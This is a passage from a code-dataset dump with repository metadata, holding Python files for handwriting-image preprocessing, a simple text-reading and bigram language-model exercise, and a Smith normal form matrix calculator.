self.buf_size\n# # until = index+self.batch_size\n\n# # zipped = list(zip(self.img_buf, self.lab_buf))\n# # np.random.shuffle(zipped)\n\n# # X, Y = zip(*zipped)\n# # X = list(X)\n# # Y = list(Y)\n\n# # x = np.array(X[:self.batch_size])\n# # y = Y[:self.batch_size]\n\n# # if until < self.size:\n# # X[:self.batch_size] = self.dataset['image'][index:until]\n# # Y[:self.batch_size] = self.dataset['label'][index:until]\n\n# # elif index < self.size:\n# # X = X[until-self.size:]\n# # Y = Y[until-self.size:]\n# # until = self.size\n# # X[:until-index] = self.dataset['image'][index:until]\n# # Y[:until-index] = self.dataset['label'][index:until]\n\n# # else:\n# # X = X[self.batch_size:]\n# # Y = Y[self.batch_size:]\n\n# # self.img_buf = X\n# # self.lab_buf = Y\n\n# # x = pp.augmentation(x, \n# # rotation_range=5.0, \n# # scale_range=0.05, \n# # height_shift_range=0.025, \n# # width_shift_range=0.05, \n# # erode_range=5, \n# # dilate_range=3)\n# # x = pp.normalization(x)\n# # # y = [self.tokenizer.texts_to_sequences(word.decode())[0] for word in y]\n# # # y = np.array([np.pad(np.asarray(seq), (0, self.maxTextLength-len(seq)), constant_values=(-1, self.PAD)) for seq in y])\n# # y_ = []\n# # for word in y:\n# # seq = self.tokenizer.texts_to_sequences(word.decode())[0]\n# # padded_seq = np.pad(seq, (0, self.maxTextLength-len(seq)))\n# # y_.append(padded_seq)\n\n# # y = np.array(y_)\n\n# # return (x, y)\n\n\n\n# # def on_epoch_end(self):\n# # if self.partition in ['train'] and self.buf_size:\n# # self.img_buf = self.dataset['image'][0:self.buf_size]\n# # self.lab_buf = self.dataset['label'][0:self.buf_size]\n\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 12.333333015441895, "blob_id": "bbdcb0dc36165c82c7cfb02c7a79ede9b8db5bd0", "content_id": "76474f774b17c3b37c83a6ec2ea5430ef01ad83b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40, "license_type": "no_license", "max_line_length": 24, "num_lines": 3, "path": "/src/test.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "from data import imgproc\n\nprint(\"main\")\n" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 16, "blob_id": "5c97dadc4ffe0a75ea2b3d9f7c775207f8b216e0", "content_id": "c9d095f5c16618b17fc2d0cdd80213d581965374", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 102, "license_type": "no_license", "max_line_length": 16, "num_lines": 6, "path": "/README.md", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "# project_backup\n# project_backup\n# project_backup\n# project_backup\n# project_backup\n# project_backup\n" }, { "alpha_fraction": 0.5454959869384766, "alphanum_fraction": 0.576282799243927, "avg_line_length": 31.723880767822266, "blob_id": "cf9137623bcfbf69c28009c718f17db9b3d2bd18", "content_id": "d282363e4ec6095adf89ab5956fa8048d2525e63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4385, "license_type": "no_license", "max_line_length": 123, "num_lines": 134, "path": "/src/Preprocess_image.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\n\ndef adjust_to_see(img):\n (h, w) = img.shape[:2]\n (cX, cY) = (w // 2, h // 2)\n\n M = cv2.getRotationMatrix2D((cX, cY), -90, 1.0)\n cos = np.abs(M[0, 0])\n sin = np.abs(M[0, 1])\n\n nW = int((h * sin) + (w * cos))\n nH = int((h * cos) + (w * sin))\n\n M[0, 2] += (nW / 2) - cX\n M[1, 2] += (nH / 2) - cY\n\n img = cv2.warpAffine(img, M, (nW + 1, nH + 1))\n img = cv2.warpAffine(img.transpose(), M, (nW, nH))\n\n return img\n\n\ndef imread(img_path, target_size):\n img = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\n if img is None:\n img = np.zeros((target_size[1], target_size[0]), dtype=np.uint8)\n u, i = np.unique(img.flatten(), return_inverse=True)\n background_intensity = int(u[np.argmax(np.bincount(i))])\n return img, background_intensity\n\ndef preprocess_image(image_path, target_size, augmentation=False):\n image, bg_intensity = imread(image_path, target_size)\n (t_w, t_h, ch) = target_size\n (h, w) = image.shape\n fx = w/t_w\n fy = h/t_h\n f = max(fx, fy)\n newsize = (max(min(t_w, int(w / f)), 1), max(min(t_h, int(h / f)), 1))\n image = cv2.resize(image, newsize)\n (h, w) = image.shape\n background = np.ones((t_h, t_w), dtype=np.uint8) * bg_intensity\n row_freedom = background.shape[0]-image.shape[0]\n col_freedom = background.shape[1]-image.shape[1]\n row_off=0\n col_off=0\n if augmentation:\n if row_freedom:\n row_off = np.random.randint(0, row_freedom)\n if col_freedom:\n col_off = np.random.randint(0, col_freedom)\n else:\n row_off, col_off = row_freedom//2 , col_freedom//2\n \n background[row_off:row_off+h, col_off:col_off+w] = image\n \n image = cv2.transpose(background)\n return image\n\ndef augmentation(image_batch, \n rotation_range=0, \n scale_range=0, \n height_shift_range=0, \n width_shift_range=0,\n dilate_range=1, \n erode_range=1):\n\n imgs = np.asarray(image_batch)\n _, h, w = imgs.shape\n\n background_intensity = []\n for img in imgs: \n u, i = np.unique(img.flatten(), return_inverse=True)\n background_intensity.append(int(u[np.argmax(np.bincount(i))]))\n\n imgs = imgs.astype(np.float32)\n\n dilate_kernel = np.ones((int(np.random.uniform(1, dilate_range)),), np.uint8)\n erode_kernel = np.ones((int(np.random.uniform(1, erode_range)),), np.uint8)\n height_shift = np.random.uniform(-height_shift_range, height_shift_range)\n rotation = np.random.uniform(-rotation_range, rotation_range)\n scale = np.random.uniform(1 - scale_range, 1)\n width_shift = np.random.uniform(-width_shift_range, width_shift_range)\n trans_map = np.float32([[1, 0, width_shift * w], [0, 1, height_shift * h]])\n rot_map = cv2.getRotationMatrix2D((w // 2, h // 2), rotation, scale)\n\n trans_map_aff = np.r_[trans_map, [[0, 0, 1]]]\n rot_map_aff = np.r_[rot_map, [[0, 0, 1]]]\n affine_mat = rot_map_aff.dot(trans_map_aff)[:2, :]\n\n for i in range(_):\n imgs[i] = cv2.warpAffine(imgs[i], affine_mat, (w, h), flags=cv2.INTER_NEAREST, borderValue=background_intensity[i])\n imgs[i] = cv2.erode(imgs[i], erode_kernel, iterations=1)\n imgs[i] = cv2.dilate(imgs[i], dilate_kernel, iterations=1)\n if np.random.random() < 0.1:\n \timgs[i] = 255 - imgs[i]\n\n return imgs\n\ndef normalization(image_batch):\n imgs = np.asarray(image_batch).astype(np.float32)\n imgs = np.expand_dims(imgs / 255, axis=-1)\n return imgs\n\ndef preprocess_label(text, maxTextLength):\n cost = 0\n for i in range(len(text)):\n if i != 0 and text[i] == text[i-1]:\n cost += 2\n else:\n cost += 1\n\n if cost > maxTextLength:\n return (False, text[:i])\n\n return (True, text)\n \nif __name__ == \"__main__\":\n img1 = cv2.imread(\"t.png\", 0)\n import matplotlib.pyplot as plt\n\n plt.subplot(121)\n plt.imshow(img1, cmap='gray')\n img2 = preprocess_image(\"t.png\", (256, 64, 1), True)\n img2 = augmentation([img2],rotation_range=20.0, \n scale_range=0.05, \n height_shift_range=0.025, \n width_shift_range=0.05, \n erode_range=5, \n dilate_range=3)\n img2 = normalization(img2)[0]\n plt.subplot(122)\n plt.imshow(adjust_to_see(img2), cmap='gray')\n plt.show()\n" } ]
7
jangwoopark/short-nlp
https://github.com/jangwoopark/short-nlp
9a57e80ae430296333936a03100345244f139ecb
2c546cd537c73996d7c5bdaba8dd7ff049d25003
0ad0da9cf963716611d32483fd45d54644253d23
refs/heads/master
2021-05-10T23:57:38.370603
2018-12-27T00:27:49
2018-12-27T00:27:49
118,294,291
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6131221652030945, "alphanum_fraction": 0.6146304607391357, "avg_line_length": 31.341463088989258, "blob_id": "344321c6883bd122523acc6cd54c7ade152c53d1", "content_id": "e2b9c4f5ddc44650ecf1cb8c6feb6d65b4e18eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1326, "license_type": "no_license", "max_line_length": 101, "num_lines": 41, "path": "/read.py", "repo_name": "jangwoopark/short-nlp", "src_encoding": "UTF-8", "text": "\"\"\"Reading in text files.\"\"\" \n\ndef read_file(filename):\n \"\"\"Read a plain text file and return the contents as a string.\"\"\"\n # TODO: Open \"filename\", read text and return it\n with open(filename) as f:\n text = f.read()\n return text\n\ndef read_files(path):\n \"\"\"Read all files that match given path and return a dict with their contents.\"\"\"\n\n # TODO: Get a list of all files that match path (hint: use glob)\n import glob\n import os\n files = []\n for name in glob.iglob(os.path.join(os.getcwd()+'/'+path)):\n files.append(name)\n # TODO: Read each file using read_file()\n\n # TODO: Store & return a dict of the form { <filename>: <contents> } Note: <filename> is just the\n # filename (e.g. \"hieroglyph.txt\") not the full path (\"data/hieroglyph.txt\")\n file_contents_mapping = {}\n for path in enumerate(files):\n path = path[1]\n extracted_filename_from_path = path.split(\"/\")[-1]\n file_contents_mapping[extracted_filename_from_path] = read_file(path)\n return file_contents_mapping\n\ndef test_run():\n # Test read_file()\n print(read_file(\"data/hieroglyph.txt\"))\n\n # Test read_files()\n texts = read_files(\"data/*.txt\")\n for name in texts:\n print(\"\\n***\", name, \"***\")\n print(texts[name])\n\nif __name__ == '__main__':\n test_run()\n" }, { "alpha_fraction": 0.6379696130752563, "alphanum_fraction": 0.643336296081543, "avg_line_length": 42, "blob_id": "ebddbd1d22565bd5fe00349b11e25a4cd2cc5184", "content_id": "1929dadb02169b2c2b38ac2c8a5ebb30a635e479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4472, "license_type": "no_license", "max_line_length": 112, "num_lines": 104, "path": "/bigram.py", "repo_name": "jangwoopark/short-nlp", "src_encoding": "UTF-8", "text": "\"\"\"Bigram Model.\"\"\" \n\nimport os \nimport re \nimport random \nimport collections \n\ndef read_file(filename):\n \"\"\"Read a plain text file and return the contents as a string.\"\"\"\n with open(filename, 'r') as f:\n text= f.read()\n return text\n\ndef compute_bigram_model(path, files):\n \"\"\"Compute a bigram model for a given corpus, including unigram probabilities.\n Params\n ======\n path: directory where input files are located\n files: list of files, or a single string specifying regex pattern to match (e.g. r'.*\\.txt')\n Returns\n =======\n p_unigrams: dict with frequency of single words (need not be normalized to [0, 1])\n p_bigrams: dict of dicts with frequency of bigrams (need not be normalized to [0, 1])\n \"\"\"\n # Grab a list of all files in specified corpus\n\n if isinstance(files, str):\n files = [f for f in os.listdir(path) if re.match(files, f)] # collect all matching filenames\n files = [os.path.join(path, f) for f in files] # prepend path to each filename\n\n # TODO: Read in text from each file and combine into a single string\n\n filenames= [os.path.basename(file_path) for file_path in files]\n contents= [read_file(file_path) for file_path in files]\n contents_dict= dict(zip(filenames, contents))\n\n # TODO: Clean and tokenize text (note that you may want to retain case and sentence delimiters)\n for key, val in contents_dict.items():\n contents_dict[key]= re.findall(\"\\w+\", val)\n words= contents_dict[key]\n unigram_counts= collections.Counter()\n unigram_counts.update(words)\n total_counts= float(sum(unigram_counts.values()))\n bigrams= collections.defaultdict(list)\n\n # TODO: Compute unigram probabilities\n\n # unigram probabilities unigrams= [words[i] for i in range(len(words) - 1)]\n for key, val in unigram_counts.items():\n unigram_counts[key]\n unigram_vals= unigram_counts.values()\n unigram_elements= unigram_counts.elements()\n unigram_probs= [value/total_counts for value in unigram_vals]\n p_unigrams= dict(zip(unigram_elements, unigram_probs))\n\n # TODO: Compute bigram probabilities\n\n # assemble bigrams dictionary\n for i in range(len(words) - 1):\n current_word= words[i]\n next_word= words[i + 1]\n bigrams[current_word].append(next_word)\n # convert to probabilities\n p_bigrams= dict()\n for word in bigrams.keys():\n bigram_counts= collections.Counter()\n bigram_counts.update(bigrams[word])\n bigram_elements= bigram_counts.elements()\n bigram_values= bigram_counts.values()\n word_sum= float(sum(bigram_values))\n bigram_probs= [value/word_sum for value in bigram_values]\n p_bigrams[word]= dict(zip(bigram_elements, bigram_probs))\n return p_unigrams, p_bigrams \n\ndef generate_sequence(p_unigrams, p_bigrams, num_words=100, seed_word=None):\n \"\"\"Generate a random sequence of words, given unigram and bigram probabilities.\"\"\"\n # If seed_word is not given, pick one randomly based on unigram probabilities\n if seed_word is None:\n seed_word = random.choices(list(p_unigrams.keys()), weights=list(p_unigrams.values()))[0]\n seq = [seed_word]\n for i in range(num_words):\n seq.append(random.choices(list(p_bigrams[seq[-1]].keys()),weights=list(p_bigrams[seq[-1]].values()))[0])\n return seq \n\ndef test_run():\n # Compute bigram model\n p_unigrams, p_bigrams = compute_bigram_model(path='.', files=['data/carroll-alice.txt'])\n # Check most common unigrams (single words)\n print(\"10 most common unigrams:\")\n sorted_unigrams = sorted(p_unigrams.items(), key=lambda item: item[1], reverse=True) # each item = (i,count)\n for word, count in sorted_unigrams[:10]:\n print(\"{}\\t{}\".format(word, count))\n # Check most common bigrams (pairs of words)\n all_bigrams = [(i, j, count) for i in p_bigrams.keys() for j, count in p_bigrams[i].items()]\n sorted_bigrams = sorted(all_bigrams, key=lambda item: item[2], reverse=True) # each item = (i, j,count)\n print(\"10 most common bigrams:\")\n for i, j, count in sorted_bigrams[:10]:\n print(\"{}\\t{}\\t{}\".format(i, j, count))\n # Generate a sample sequence of words\n seq = generate_sequence(p_unigrams, p_bigrams, seed_word=\"Alice\")\n print(\" \".join(seq)) \n\nif __name__ == \"__main__\":\n test_run()\n" }, { "alpha_fraction": 0.7840909361839294, "alphanum_fraction": 0.7840909361839294, "avg_line_length": 28.33333396911621, "blob_id": "c38090d4b81b569784f990d058f5bb048474709b", "content_id": "bf5b067a2265e944137de2d124cc2dd813044c81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 352, "license_type": "no_license", "max_line_length": 101, "num_lines": 12, "path": "/README.md", "repo_name": "jangwoopark/short-nlp", "src_encoding": "UTF-8", "text": "# short-nlp\n## text processing\n\nRead.py for reading from CSV files.\n\nSplit.py for splitting into sentences and into words.\n\nbigram.py for statistical pairs of words.\n\nEach text should be under the data folder, and the path should be in the corresponding input command.\n\nThe resource file has links to interesting reads for those who want to go beyond.\n" } ]
3
dzinghan/smith-normal-form-calculator
https://github.com/dzinghan/smith-normal-form-calculator
fc18ed87ce6b4751d0ef8e28018cbbb2afef6da1
f6211f7fb054096bad1bec728c83d7975534d8da
3dbb3aad555a878f5b65980e5cbe8e6208889a16
refs/heads/master
2022-12-03T10:02:11.827960
2020-08-22T16:37:11
2020-08-22T16:37:11
289,160,902
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.47213777899742126, "alphanum_fraction": 0.48391589522361755, "avg_line_length": 29.766128540039062, "blob_id": "3a12f37d8527ddc4ab2b1705ca9e11c6af44acc3", "content_id": "c3303363cf00bb6c9ac21c75e43d3dc3f19053a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7896, "license_type": "no_license", "max_line_length": 99, "num_lines": 248, "path": "/Matrix1.py", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "'''\r\nLouis Philippe Ignatieff\r\nQiu Shi Wang\r\nJing Han Sun\r\n'''\r\n\r\n'''Here is our implementation of a Matrix1 class mainly for the purpose of calculating\r\nthe Smith normal form. We do not explain all the methods in detail.'''\r\n\r\n\r\nimport copy\r\nclass Matrix1(object):\r\n \r\n def __init__(self, list):\r\n '''initialize the matrix as a list of lists, every list, a row'''\r\n self.list = list\r\n self.nrows = len(list)\r\n self.ncols = len(list[0])\r\n self.shape = (self.nrows, self.ncols)\r\n \r\n def is_zero(self):\r\n '''check for the zero matrix'''\r\n for row in self:\r\n for entry in row:\r\n if entry != 0:\r\n return False\r\n return True\r\n \r\n def __setitem__(self,coords,v):\r\n '''initialize item assignments'''\r\n i, j = coords\r\n self.list[i][j] = v\r\n \r\n def __getitem__(self,coords):\r\n '''initialize an index method for matrices'''\r\n if isinstance(coords, int):\r\n return self.list[coords]\r\n else:\r\n i, j = coords\r\n return self.list[i][j]\r\n\r\n def row(self, index):\r\n '''returns the row vector/matrix for a given index'''\r\n return Matrix1([self.list[index]])\r\n\r\n def T(self):\r\n '''returns the transpose of the matrix'''\r\n tr = []\r\n cols = []\r\n for i in range(self.ncols):\r\n for row in self.list:\r\n cols.append(row[i])\r\n if len(cols) == self.nrows:\r\n tr.append(cols)\r\n cols = []\r\n return Matrix1(tr)\r\n \r\n def __repr__(self):\r\n '''initializes a string representation for matrices'''\r\n return str(self.list)\r\n\r\n def __str__(self):\r\n '''initializes the string method using repr'''\r\n return repr(self)\r\n\r\n def __iter__(self):\r\n '''initializes an iterable for matrices'''\r\n return iter(self.list)\r\n\r\n def col(self, index):\r\n '''returns the column vector/matrix for a given index'''\r\n return Matrix1([self.T().list[index]]).T()\r\n\r\n def __add__(self, other):\r\n '''initializes standard matrix addition, entry by entry'''\r\n if self.shape != other.shape:\r\n raise ValueError('Matrices of different sizes')\r\n else:\r\n NewMatrix = []\r\n for row_a, row_b in zip(self, other):\r\n NewRow = []\r\n for a, b in zip(row_a, row_b):\r\n NewRow.append(a+b)\r\n NewMatrix.append(NewRow)\r\n return Matrix1(NewMatrix)\r\n\r\n def __mul__(self, other):\r\n '''initializes standard matrix multiplication and right scalar\r\n multiplication, here we need to copy the matrix in order\r\n to keep the original intact, not implemented by us'''\r\n if type(other) == int: #scalar multiplication to the right\r\n c = copy.deepcopy(self.list)\r\n C = Matrix1(c)\r\n for i in range(self.nrows):\r\n for j in range(self.ncols):\r\n C[i,j] *= other\r\n return C\r\n \r\n elif type(other) == Matrix1 and self.ncols == other.nrows: #matrix multiplication\r\n P = []\r\n for i in range(self.nrows):\r\n row = []\r\n for j in range(other.ncols):\r\n Sum = 0\r\n for k in range(self.ncols):\r\n Sum += self[i,k]*other[k,j]\r\n row.append(Sum)\r\n P.append(row)\r\n return Matrix1(P)\r\n \r\n def __rmul__(self, other): #scalar multiplication to the left\r\n '''initializes standard scalar multiplication to the left'''\r\n if type(other) == int:\r\n c = copy.deepcopy(self.list)\r\n C = Matrix1(c)\r\n for i in range(self.nrows):\r\n for j in range(self.ncols):\r\n C[i,j] *= other\r\n return C\r\n\r\n def __sub__(self, other):\r\n '''initializes substraction using scalar multiplication and addition'''\r\n return self + -1*other\r\n\r\n def __eq__(self, other):\r\n '''initializes equal sign for matrices (if every entry is equal)'''\r\n if self.shape != other.shape:\r\n return False\r\n else:\r\n for i in range(self.nrows):\r\n for j in range(self.ncols):\r\n if self[i,j] != other[i,j]:\r\n return False\r\n return True\r\n \r\n\r\n def __ne__(self, other):\r\n '''initializes inequal sign for matrices using __eq__'''\r\n return not self == other\r\n\r\n def rowop1(self, i,j): #All the row operation methods return the matrix\r\n '''exchange rows elementary operation matrix'''\r\n #with the row operation done, without modifying self\r\n E = eye(self.nrows)\r\n return exchange_rows(E,i,j)*self\r\n\r\n def rowop2(self, i, a):\r\n '''multiplying row elementary operation matrix'''\r\n E = eye(self.nrows)\r\n E[i,i] = a\r\n return E*self\r\n\r\n def rowop3(self, i, j, a):\r\n '''subtract rows from each other elementary operation matrix'''\r\n E = eye(self.nrows)\r\n E[i,j] = a\r\n return E*self\r\n\r\n def reduction(self):\r\n '''reduces to upper triangular using Gauss-Jordan elimination'''\r\n c = copy.deepcopy(self.list)\r\n C = Matrix1(c)\r\n D = zeros(self.nrows, self.ncols)\r\n \r\n #Step 1: put all nonzero rows at the top of D.\r\n #This is equivalent to putting all zero rows at bottom.\r\n \r\n k = 0\r\n for i in range(C.nrows):\r\n if C.row(i) != zeros(1, C.ncols):\r\n for j in range(C.ncols):\r\n D[k,j] = C[i,j]\r\n k += 1\r\n \r\n #Step 2: find the leftmost nonzero column and a nonzero entry in it: put it on top\r\n\r\n t = 0 #number of iterations, also row of pivot\r\n j = 0 #column of pivot\r\n\r\n while t != D.nrows-1 and j != D.ncols:\r\n while j != D.ncols and D.col(j) == 2*D.col(j):\r\n j += 1\r\n if j == D.ncols:\r\n return D\r\n i = t\r\n while D[i,j] == 0 and i != D.nrows-1:\r\n i += 1\r\n if D[i,j] == 0:\r\n break\r\n D = D.rowop1(t,i)\r\n #Step 3: reduce all rows below it\r\n for r in range(t+1, D.nrows):\r\n D = D.rowop3(r, t, -D[r,j]/D[t,j])\r\n t += 1\r\n j += 1\r\n return D\r\n \r\n def rank(self):\r\n '''compute rank of matrix based on row-reduction'''\r\n R = self.reduction()\r\n x = 0\r\n for i in R.list:\r\n if not Matrix1([i]) == 2*Matrix1([i]):\r\n x += 1\r\n return x\r\n\r\ndef eye(n):\r\n '''constructs the identity matrix'''\r\n Id = zeros(n,n)\r\n for i in range(n):\r\n Id[i,i] = 1\r\n return Id\r\n \r\ndef zeros(nrows, ncols):\r\n '''constructs the zero matrix'''\r\n M = []\r\n for i in range(nrows):\r\n R = []\r\n for j in range(ncols):\r\n R.append(0)\r\n M.append(R)\r\n return Matrix1(M)\r\n\r\ndef exchange_rows(self, i, j):\r\n '''row operation #1'''\r\n m, n = self.shape\r\n Id = eye(m)\r\n if i == j:\r\n return Id\r\n # The elementary matrix which exchanges rows, is the row exchanged identity\r\n Id[i, i] = 0\r\n Id[j, j] = 0\r\n if i < j:\r\n i, j = j, i\r\n Id[i, i-abs(i-j)] = 1\r\n Id[j, j+abs(i-j)] = 1\r\n return Id\r\n\r\n\r\n#--------TEST---------\r\n'''\r\nM = Matrix1([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\r\nN = Matrix1([[1, 1, 1], [1, 1, 1], [1, 1, 1]])\r\nA = Matrix1([[1, 1, 1], [1, 1, 1], [1, 1, 1]])\r\nH = Matrix1([[1,2],[3,4]])\r\nZ = Matrix1([[0,0],[0,0],[0,0]])\r\n'''\r\n#most important reference : https://igraph.org/python/doc/igraph.datatypes-pysrc.html#Matrix.__ne__\r\n\r\n\r\n \r\n" }, { "alpha_fraction": 0.4188340902328491, "alphanum_fraction": 0.4304932653903961, "avg_line_length": 28.135135650634766, "blob_id": "0f9255774183e4d7a1bc8eca9aa830e2884eae2a", "content_id": "8e53bdc4d7ea76389e42f785fa84c1532171bb90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6693, "license_type": "no_license", "max_line_length": 118, "num_lines": 222, "path": "/smith.py", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "\"\"\"\r\nQiu Shi Wang\r\nLouis Philippe Ignatieff\r\nJing Han Sun\r\n\r\nProgramming final project: Smith normal form\r\n\"\"\"\r\n\r\nfrom sympy import *\r\nfrom Matrix1 import *\r\n\r\n#We want this to return a tuple of three matrices: U, D and V, where D=UAV\r\ndef smith(A):\r\n '''computes the Smith Normal form of a matrix'''\r\n nrows, ncols = A.shape\r\n j_t = 0\r\n leftlist = [] #matrices to left multiply onto A, in order\r\n rightlist = [] \r\n for t in range(nrows):\r\n \r\n #step 1: choose pivot\r\n \r\n while A.col(j_t) == zeros(nrows, 1) and j_t != ncols-1:\r\n j_t += 1\r\n if A.col(j_t) == zeros(nrows, 1) and j_t == ncols-1:\r\n break\r\n K = 0\r\n\r\n while A[K, j_t] == 0:\r\n K += 1\r\n leftlist.append(exchange_rows(A, t, K))\r\n A = exchange_rows(A, t, K)*A\r\n\r\n #target row and column\r\n tr = zeros(1, ncols)\r\n tr[0, j_t] = A[t, j_t]\r\n tc = zeros(nrows, 1)\r\n tc[t,0] = A[t,j_t]\r\n while A.row(t) != tr or A.col(j_t) != tc:\r\n \r\n #step 2: improve pivot\r\n \r\n for k in range(t, nrows):\r\n if A[k,j_t] % A[t,j_t] != 0:\r\n #We use the Bézout property to find integers s and t such that\r\n #A[t,j_t] * s + A[k,j_t] * t = b\r\n\r\n (b,S,T) = egcd(A[t, j_t], A[k, j_t])\r\n alpha = A[t, j_t]//b\r\n gamma = A[k, j_t]//b\r\n\r\n L_0 = Matrix1([[S, T], [-gamma, alpha]])\r\n Id = eye(nrows)\r\n Id[t,t] = S\r\n Id[t, k] = T\r\n Id[k, t] = -gamma\r\n Id[k, k] = alpha\r\n\r\n leftlist.append(Id)\r\n A = Id*A\r\n \r\n #step 3: eliminating\r\n \r\n leftlist.append(RRcol(A, j_t))\r\n A = RRcol(A, j_t)*A\r\n\r\n \r\n #step 4: repeat step 2 and 3 for columns\r\n \r\n A = A.T() #transpose\r\n nrows, ncols = A.shape\r\n t, j_t = j_t, t #transpose\r\n \r\n\r\n for k in range(t, nrows):\r\n if A[k, j_t] % A[t, j_t] != 0:\r\n #We use the Bézout property to find integers s and t such that\r\n #A[t, j_t] * s + A[k, j_t] * t = b\r\n\r\n (b, S, T) = egcd(A[t, j_t], A[k, j_t])\r\n alpha = A[t, j_t]//b\r\n gamma = A[k, j_t]//b\r\n\r\n L_0 = Matrix1([[S, T], [-gamma, alpha]])\r\n Id = eye(nrows)\r\n Id[t,t] = S\r\n Id[t, k] = T\r\n Id[k, t] = -gamma\r\n Id[k, k] = alpha\r\n\r\n rightlist.append(Id.T()) #append the transpose\r\n A = Id*A\r\n\r\n rightlist.append(RRcol(A, j_t).T())\r\n A = RRcol(A, j_t)*A\r\n\r\n A = A.T() #transpose back\r\n nrows, ncols = A.shape \r\n t, j_t = j_t, t #transpose back\r\n\r\n tr[0, j_t] = A[t, j_t] #check target row and column5\r\n tc[t, 0] = A[t,j_t]\r\n \r\n j_t += 1\r\n if j_t >= ncols:\r\n break\r\n \r\n #step 5: switch rows of A^T such that the nonzero entries are all on the diagonal\r\n\r\n A = A.T() #transpose\r\n nrows, ncols = A.shape\r\n for i in range(nrows):\r\n if A.row(i) != zeros(1, ncols):\r\n j = 0\r\n while A[i, j] == 0:\r\n j += 1\r\n rightlist.append(exchange_rows(A, i, j).T())\r\n A = exchange_rows(A, i, j)*A\r\n A = A.T()\r\n nrows, ncols = A.shape\r\n \r\n #step 6: ensure that the divisibility criterion is satisfied\r\n\r\n Nc = 0\r\n while A.col(Nc) != zeros(nrows, 1):\r\n Nc+=1\r\n if Nc == ncols:\r\n break\r\n Nr = 0\r\n while A.row(Nr) != zeros(1, ncols):\r\n Nr+=1\r\n if Nr == nrows:\r\n break\r\n\r\n N = min(Nc, Nr) \r\n #N is now the total number of nonzero entries/rows/columns\r\n for i in range(N-1):\r\n if int(A[i+1, i+1]) % int(A[i, i]) != 0:\r\n A = A.T() #transpose\r\n nrows, ncols = A.shape\r\n Id = eye(nrows)\r\n Id[i, i+1] = 1\r\n rightlist.append(Id.T())\r\n A = Id*A\r\n beta = gcd(int(A[i, i]), int(A[i+1, i+1]))\r\n \r\n A = A.T() #transpose\r\n nrows, ncols = A.shape\r\n Id = eye(nrows)\r\n Id[i, i+1] = int((beta-A[i, i])//(A[i+1, i+1]))\r\n leftlist.append(Id)\r\n A = Id*A\r\n\r\n #step 3 again\r\n leftlist.append(RRcol(A, i))\r\n A = RRcol(A, i)*A\r\n\r\n A = A.T()\r\n nrows, ncols = A.shape\r\n rightlist.append(RRcol(A, i).T())\r\n A = RRcol(A, i)*A\r\n\r\n A = A.T()\r\n nrows, ncols = A.shape\r\n\r\n #Step 7: make all the entries in the Smith normal form positive\r\n #This can be done because the operator of multiplying a row by -1 is invertible\r\n #over Z. In fact, it is its own inverse.\r\n\r\n Id = eye(nrows)\r\n for i in range(N):\r\n if sign(A[i, i]) == -1: #if an entry is negative\r\n Id[i, i] = -1\r\n leftlist.append(Id)\r\n A = Id*A\r\n \r\n L0 = eye(nrows) #Multiply together the (invertible) matrices in the leftlist and the rightlist\r\n #to create the matrices U and V\r\n for L in leftlist:\r\n L0 = L*L0\r\n R0 = eye(ncols)\r\n for R in rightlist:\r\n R0 = R0*R\r\n return (A, L0, R0)\r\n \r\ndef RRcol(A, j_t):\r\n '''Row reduces the j_t-th column, leaving only the uppermost entry nonzero'''\r\n nrows, ncols = A.shape\r\n i = 0\r\n while A[i, j_t] == 0:\r\n i += 1\r\n Id = eye(nrows)\r\n for k in range(i+1, nrows):\r\n Id[k, i] = -A[k, j_t]//A[i, j_t]\r\n return Id\r\n \r\ndef exchange_rows(self, i, j):\r\n '''exchange 2 rows'''\r\n m, n = self.shape\r\n Id = eye(m)\r\n if i == j:\r\n return Id\r\n # The elementary matrix which exchanges rows, is the row exchanged idendity\r\n Id[i, i] = 0\r\n Id[j, j] = 0\r\n if i < j:\r\n i, j = j, i\r\n Id[i, i-abs(i-j)] = 1\r\n Id[j, j+abs(i-j)] = 1\r\n return Id\r\n\r\n# Not my code from this line down: found at https://www.techiedelight.com/extended-euclidean-algorithm-implementation/\r\n# This is an implementation of the extended Euclidean algorithm to find the coefficients\r\n# that satisfy Bézout's identity\r\n\r\ndef egcd(a, b):\r\n a, b = int(a), int(b)\r\n if a == 0:\r\n return (b, 0, 1)\r\n else:\r\n gcd, x, y = egcd(b % a, a)\r\n return (gcd, y - (b//a) * x, x) #The last two numbers are our s and t\r\n" }, { "alpha_fraction": 0.6434316635131836, "alphanum_fraction": 0.6595174074172974, "avg_line_length": 27.760000228881836, "blob_id": "dbf98bee26ed57d3a874dc0a94b81b35d594e50b", "content_id": "5a3bc0646e43d4824248c38bc7bfcf1185ae66c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 746, "license_type": "no_license", "max_line_length": 105, "num_lines": 25, "path": "/smithcalc.py", "repo_name": "dzinghan/smith-normal-form-calculator", "src_encoding": "UTF-8", "text": "\"\"\"\r\nQiu Shi Wang\r\nLouis Philippe Ignatieff\r\nJing Han Sun\r\n\r\nProgramming final project: Smith normal form user interface\r\n\"\"\"\r\n\r\nfrom sympy import *\r\nfrom smith import *\r\ninit_printing(use_unicode=True)\r\n\r\nprint(\"Smith 